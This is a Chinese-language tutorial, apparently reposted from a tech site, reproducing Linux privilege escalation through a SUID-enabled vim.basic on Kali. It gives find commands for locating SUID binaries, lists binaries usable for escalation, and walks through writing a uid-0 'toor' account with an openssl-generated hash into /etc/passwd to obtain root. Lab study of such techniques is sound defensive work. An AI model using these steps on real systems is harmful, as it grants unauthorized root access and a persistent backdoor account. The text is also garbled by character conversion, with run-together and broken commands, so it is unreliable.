Linux使用suid vim.basic文件實(shí)現(xiàn)提權(quán)
在kali上復(fù)現(xiàn)
先給需要的vim.basic文件設(shè)置suid權(quán)限
chmod u+s /usr/bin/vim.basic
先adduser test1一個(gè)普通權(quán)限用戶(hù)
現(xiàn)在就是一個(gè)合適的提權(quán)環(huán)境
通過(guò)以下命令可以找到存在suid權(quán)限的文件
find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;
可用于提權(quán)的文件有
nmap vim find bash more less nano cp
利用vim提權(quán)的思路是修改etc/passwd文件,為自己添加一個(gè)有root權(quán)限的用戶(hù)
passwd文件用戶(hù)格式為:用戶(hù)名:密碼:uid:gid:注釋:home目錄:用戶(hù)的shell
這邊可以看看root用戶(hù)的格式
root:x:0:0:root:/root:/bin/bash
(密碼這部分之所以是x,是因?yàn)檎嬲拿艽a存在/etc/shadow文件里)
生成密碼:用openssl passwd -1 ?salt asd 123 (這里是-1(數(shù)字1)不是L)
直接寫(xiě)在passwd文件里面,
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
用vim /etc/passwd可以修改,但是在保存是會(huì)出現(xiàn)E212,無(wú)法保存,提示我們沒(méi)有權(quán)限修改這個(gè)
這時(shí)應(yīng)該用之前find找到的vim.basic文件運(yùn)行,這個(gè)程序是有suid權(quán)限的。絕對(duì)可以修改
vim.basic /etc/passwd
用這個(gè)打開(kāi),然后修改文件,就可以成功保存
可以看到已經(jīng)添加了,su toor切換,密碼123,再id查看一下權(quán)限
root權(quán)限
chmod u+s /usr/bin/vim.basic
以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持好吧啦網(wǎng)。
相關(guān)文章:
1. FreeBSD10安裝內(nèi)核源代碼方法講解2. 統(tǒng)信UOS個(gè)人版(V201030)正式發(fā)布 新增功能匯總3. 服務(wù)器的時(shí)間同步設(shè)置方法4. uos怎么格式化硬盤(pán)? UOS磁盤(pán)分區(qū)格式化的技巧5. FreeBSD 9.3 正式發(fā)布附官方下載地址6. AIX上克隆rootvg的操作方法 7. mac程序沒(méi)反應(yīng)怎么辦 mac強(qiáng)制關(guān)閉程序的方法8. 如何從 PC 上的 USB 安裝 Windows 119. UOS怎么設(shè)置時(shí)間? 統(tǒng)信UOS顯示24小時(shí)制的技巧10. 使用kali破解wifi密碼的方式
網(wǎng)公網(wǎng)安備